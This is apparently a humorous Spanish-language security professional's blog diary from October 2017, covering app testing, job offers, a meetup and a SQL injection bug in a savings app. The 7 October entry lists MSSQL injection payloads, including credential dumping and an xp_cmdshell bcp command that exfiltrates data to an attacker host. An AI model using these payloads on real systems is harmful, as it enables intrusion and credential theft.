Lunes, 16 de Octubre de 2017: Un ingeniero macho

Querido diario; hoy pasé mi prueba de fuego:

Es gracioso; en los últimos meses he aprendido que un firewall no es un muro con llamas; que un IPS es más que esa cosa que te bloquea cuando le lanzas un nmap con -T5, que un WAF es más que la cosa por la cual te pasas horas y horas pensando como configurar Acunetix, y un servidor es más que un 10.1.1.23

Ya soy un hombre de verdad ¡groooar!

¡Oh!, por cierto; el enlace de lo que hoy toda la gente de la seguridá está hablando: https://www.krackattacks.com/

Hace rato un amigo llamado Beto me preguntó si no se debiese como avisar de las implicaciones… y bueno si, pero.. pss.. digamos que estrictamente una empresa debiese de estar segura porque tiene otros controles compensatorios como cifrado, uso de VPN’s, uso de protocolos seguros, certificados, PKI, etc.. peroooooo la realidad es que coff.. coff.. bueno 😛 Beto tiene razón… se les debiese de avisar.

Martes, 10 de Octubre de 2017: lobotomía laboral

Querido diario… mi promedio de trabajo es inversamente proporcional a mi promedio de chateo. Estos días prácticamente he desaparecido del mundo.

Necesito revisar una aplicación que tiene versiones móviles, curiosamente la autenticación tiene un doble factor y es sólo por móvil; me dieron el IPA y el APK. Intenté con Android y… pues…

Reinicie, reinicie y reinicie… y nunca se desactivo el Hypervisor-V así que pues coff..  mañana intentaré otra cosa porque no he tenido tiempo.

Hoy la Señorita RH me dijo… ¡ah! si, tengo una Señorita RH, no es como RH normal, ella en realidad hum… creo que sólo se encarga que en ningún momento me llegué mi lapsus ético; bueno, me dijo “y si no te gusta el calor, las tortillas de harina, ¿por qué no regresas?”.. contesté con un táctico “si no viviese allí, probablemente tendría un buen empleo… de hecho, si no fuese por Mexicali, jamás habría conocido a Mam”.

Después de la plática con señorita RH acepté mandar mi correo para un trabajo que me ofrecieron en Austria, para dedicarme a revisar cosas en la nube, SCADA/ISC, de esas aplicaciones en donde sólo se tienen un montón de webservices que no se sabe para que sirven, pero para algo sirven.

Y ya que tenía todo dije… “Ahhhh… demonios” y me puse a hacer, lo que sea que se supone que hago… fue un día malo.

 

Sábado, 7 de Octubre de 2017: vacaciones forza… todas pagadas.

Querido diario…

Te escribo desde un aeropuerto, ¿dónde?, no te lo puedo decir; ¿esperando que vuelo?, es algo que tampoco te puedo decir.

Bueno… ser buena persona no es precisamente mi mejor talento…

A veces uno no puede resistir las ganas de meter una comilla por todos lados, suena muy guarro, pero es como cuando tienes 15 años y de pronto cuando se apagan las luces dices “¡ay!… se me fue”… bueno, pues así es cuando uno anda usando aplicaciones, de pronto uno quiere comprar calzoncillos y zas “se me fue una comilla” 😛

Bueno, seguramente también recordarán que recibieron una cachetada y probablemente llegó el papá de la ente feminoide con una escopeta… bueno, pues aquí llegaron unos policías, con un juez y me dieron unos tehuacanazos con pocito.

Y es que.. querido diario.. psss… sé qué suena complejo de creer, pero mira.. yo pues nada más le puse una comilla a un nombre, ¿yo cómo iba a saber que eso iba a estar dentro de una variable?, pues si, estaba dentro de una variable, y que un programador no validó bien la variable y entonces cuando yo intentaba sacar mi dinero pues… no podía. ¿Acaso tú no intentarías sacar tu dinero aunque no te deje la aplicación?.

Bueno… no sé, de pronto la comilla se convirtió en un ‘1 or 1=1– y cuando menos me di cuenta, pues…

'>">
' " ) # || + >
%09select 
tab%09
carriage return%13
linefeed%10
space%32
and
or
update
insert
exec
' waitfor delay '0:0:10'--

¿Qué?, ¿tú no usas ese tipo de nombres en tus cuentas bancarias?… pero si son de lo más comunes. De hecho conozco otros…

' group by [columneishons] having 1=1 - -
' union select 1,1,'cosa',1,1,1 - -
' union select 1,1, 99999999999999999,1,1,1 - -
' and 1 in (select 'cosa' ) - -
' and where cosa='cosa' and '1'='1
'; if where cosa='cosa' waitfor delay '0:0:5' --
'; union select if( where cosa='cosa' , benchmark (100000, sha1('cosa')), 'false' ),1,1,1,1;

… y pues bueno, allí estaba yo, metiendo nombres y más nombres a mis cuentas bancarias… y de pronto como que me di cuenta de que la aplicación me arrojaba algo como que users table, cosas tables y pues no sé, quería ver que tables eran esas tables.

SELECT cosa FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tabla')
sp_columns tablename

Luego de la tabla, te das cuenta que hay otras bases de datos…

' and 1 in (select min(name ) from master.dbo.sysdatabases where name >'.' ) --

Y entonces dices “ahhh pues de aquí soy”, y quieres ver si puedes sacar unos usuarios y contraseñas

'; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' 'from users where login>@varselect @var as var into temp end --

Pero no, no corrí con tanta suerte… ese tipo de errores ya no se dan tan fácil, lo que eso si…

'; create table AttackerTable (data cosa) --
'; bulk insert AttackerTable -- from 'pwdump2.exe' with (codepage='RAW')
'; exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo',' MySrvAlias','REG_SZ','DBMSSOCN, MyIP, 80' --
'; exec xp_cmdshell 'bcp "select * from AttackerTable" queryout pwdump2.exe -c -Craw -SMySrvAlias -Uvendetta -..quesadilla!!' --

Y lo sé.. me pasé.. acto seguido.. estoy aquí, arriba de un avión. Tal vez es un buen momento para escribir algo como:

Toda la información contenida en este diario es ficticia y mero entretenimiento, y/o para fines educativos. El autor no se hace responsable de actos delictivos del mal uso de esta información.

Querido diario… ¿sabías que Timbuktú de verdad existe?.

Viernes, 6 de Octubre de 2017: Ahorro obligatorio

Querido diario…

Yo soy pésimo ahorrando, no sé si sabrás pero desde que tengo recuerdo mis finanzas han sido muuuuuy malas; los bancos no me tienen mucho aprecio que digamos, y ahora que milagrosamente los planetas se han alineado y me ha estado yendo bien económicamente he probado diferentes formas de ahorro e inversión.

Una de las que recientemente he probado se llama Piggo, que es un fondo de inversión “cool”. Su idea es simplificar la inversión y hacerla entendible a un riesgo relativamente bajo. La aplicación a mi me parece malísima, esta pensada a ser completamente móvil, y cuando uno entra a una aplicación web espera tener más opciones que en la móvil, pero aquí es lo contrario. Otra de las ideas de Piggo es que ahorras para objetivos mundanos, en vez de pensar como inversor en cuando es tu margen de ganancia y demás, acá simplemente defines un objetivo “Comprar una casa”, defines tu ahorro inicial “$1000” y luego programas una domiciliazación periódica quincenal o mensual para cumplir la meta, entonces cada que recibas tu sueldo (usualmente en México quincenalmente) puedes programar un cargo automático, para como dicen por allí “si no lo tengo, no me lo gasto”.

La otra opción de Piggo es que defines tu nivel de riesgo… no explicaré mucho eso porque psss es cosa de inversiones, pero el punto es que la aplicación en automático te genera perdidas o ganancias hasta que llegas a tu objetivo, en ese momento deja de hacer los cobros y te congela tu dinero para que puedas retirarlo a tu cuenta bancaria o a la caja chica de Piggo para definir otro objetivo de ahorro. De hecho la clave de todo es que jamás maneja el término inversión, sino todo es ahorro.

Pues bueno… como yo apenas estaba probado si funcionaba o no, la descargué, me registré y al hacerlo te pide crear el primer objetivo de ahorro, como no tenía idea pensé en ponerle “Dinero para calzoncillos nuevos” pero luego dije “nah, que tal si un día tengo que pedir soporte y lee quién me atienda que mis calzoncillos están viejos, entonces le puse “Sexo, drogas & rock ‘n roll”… programé la meta de ahorro, hice mi ahorro inicial, puse el nivel de riesgo, y listo.

Como no fue mucho le puse el 100% del capital a un nivel de riesgo altísimo y un retiro sólo para probar como funcionaba la domiciliazación de ahorros. Todo iba bien, ayer gané bastante y llegué a mi objetivo en dos días. Todo era felicidad, dije “¡ots!, peroooooo.. hoy intenté sacar el dinero para ir a comprar mis calzoncillos nuevos y:

¿Qué pajoooooo?.. pues que la comilla está rompiendo la query. Y ahora mi dinero está encerrado.

Y ahora querido diario… entenderas que es un poco complicado marcar a un call center y decirle a quién te atiende “oye.. ¿sabes?, le encontré un SQL Injection a tu aplicación.. y de pasó deje mi dinero congelado, ¿me puedes ayudar?”.

Después de como dos horas en las que pasé de operador a operador y no entendían como ayudarme porque jamás les había pasado que a alguien se le ocurría poner esa comilla. Me dijeron “no entendemos, pero haremos la transferencia manual el lunes”.

Querido diario… últimamente me pasa que tengo dinero, pero por causas como que no aceptan tarjeta, PayPal, ApplePay o porque básicamente fui bendecido con un talento increible por los dioses para encontrar vulnerabilidades de una forma mágica hasta cuando intento no hacerlo; no tengo dinero.

¡Hey.. no intentes explotar el SQL injection!, es autenticado y en México son mínimo 6 años como delito federal 😉

Miércoles, 4 de Octubre de 2017: NoTrustSex

Querido diario… Bytevick me convenció de organizar un Meetup:

¿Aburrido de las “Security Nights” de $100 dlls llenas de “lauch a Nessus scan as a professional”?, ¿cansado de los cyber-meetups llenos de marcas?

NoTrustSex… digo NoTrustSec es un MeetUp creado por Victor Gomez y un sujeto exiliado en un recóndito desierto, que busca rascar en lo más profundo de tu nostalgia, haciéndote recordar esas noches de IDA, defacements y muchos alert(1) que se han quedado en el pasado bajo ese oscuro traje, y esa apretada corbata.

Este 17 de octubre, en el sur de la ciudad… ve, toca, mira, habla, comparte y aprende… entrada gratuita.

NoTrustSec
Más ‘1 or 1=1– menos sqlmap -u
https://www.meetup.com/es/NoTrustSec/

 

Martes, 3 de Octubre de 2017: sho, sho, sho me paro el taxi

Hoy tampoco haré nada, todo el día escucharé la misma canción hasta que sea mañana.

Ouuuu: quiero comprar una máquina de palomitas.

Un amigo me ofreció empleo en Singapure… hum.. dice penetration tester, pero se lee más como application security, buscar vulnerabilidades en aplicaciones de bancos asiáticos, leer código, revisar API’s hum… ¿por qué alguien querría ir a hacer eso a uno de los países más grandes de TI en el mundo?.

Ouuu.. soy un panque:

[inserte aquí emoticón del monito durmiendo en la cama]